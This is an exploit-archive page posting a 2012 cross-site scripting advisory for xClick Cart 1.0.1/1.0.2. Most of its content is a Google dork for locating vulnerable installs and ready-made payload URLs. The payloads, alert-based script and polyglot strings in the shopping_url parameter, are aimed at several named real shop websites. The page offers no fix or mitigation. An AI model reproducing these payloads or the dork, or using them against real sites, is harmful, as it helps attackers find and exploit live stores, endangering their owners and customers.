xClick Cart 1.0.1 / 1.0.2 Cross Site Scripting

xClick Cart 1.0.1 / 1.0.2 Cross Site Scripting: Posted Jan 26, 2012; Authored by Sony; xClick Cart versions 1.0.1 and 1.0.2 suffer from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | bcdba6e1a2a10dc5c0b8b5f306c9a121c7949bd1b52de3780b73383a3a2e6c07; Download | Favorite | View

xClick Cart 1.0.1 / 1.0.2 Cross Site Scripting

# Exploit Title: xClick Cart Cross Site Scripting
# Date: 27.01.2012
# Author: Sony
# Software Link: http://www.eliteweaver.co.uk/?page=_xclick-cart
# Version: v1.0.1/v1.0.2
# Google Dorks: intext:"Powered by: xClick Cart" or webscr.php?item_name=
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/xclick-cart-cross-site-scripting.html
..................................................................

Original site with software now don't work and we can looking in google on
the some forums, etc..

http://www.webmaster-forums.net/online-business-and-ecommerce/looking-xclick-cart-or-other-super-simple-one-page-cart-paypal

Demo:

Original url:

http://www.scrimshanders.com/pages/cart/webscr.php?cmd=_cart&ew=1&item_name=Scrimshaw+Kit&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=/pages/store.php%3Fsid%3D1%26cat%3D24&sid=1&os0=:&on0=
:

Url with our xss:

http://www.scrimshanders.com/pages/cart/webscr.php?cmd=_cart&ew=1&item_name=Scrimshaw+Kit&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

http://www.scrimshanders.com/pages/cart/license.txt

Another some demo:

http://www.aero-dynamicrecordings.com/html/cds/cart/webscr.php?item_name=test&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

http://paint-test-equipment.co.uk/basket/webscr.php?item_name=test&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

http://www.barossaliving.com.au/cart/webscr.php?item_name=test&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27%22%22%3E%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E

http://www.vit8.com/cart/webscr.php?item_name=Browse+Page&item_number=SK1&amount=25.00&quantity=1&shipping=&tax=0&shopping_url=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E



GreeTz to: Todd ( Packetstormsecurity.org)

Top Authors In Last 30 Days

Red Hat 210 files
Ubuntu 64 files
Debian 27 files
LiquidWorm 11 files
Valentin Lobstein 11 files
nu11secur1ty 8 files
Apple 6 files
Google Security Research 5 files
Ersin Erenler 4 files
E1.Coders 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,014)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,227)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,501)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,439)
UNIX (9,391)
UnixWare (187)
Windows (6,649)
Other

xClick Cart 1.0.1 / 1.0.2 Cross Site Scripting

xClick Cart 1.0.1 / 1.0.2 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

xClick Cart 1.0.1 / 1.0.2 Cross Site Scripting

Share This

xClick Cart 1.0.1 / 1.0.2 Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems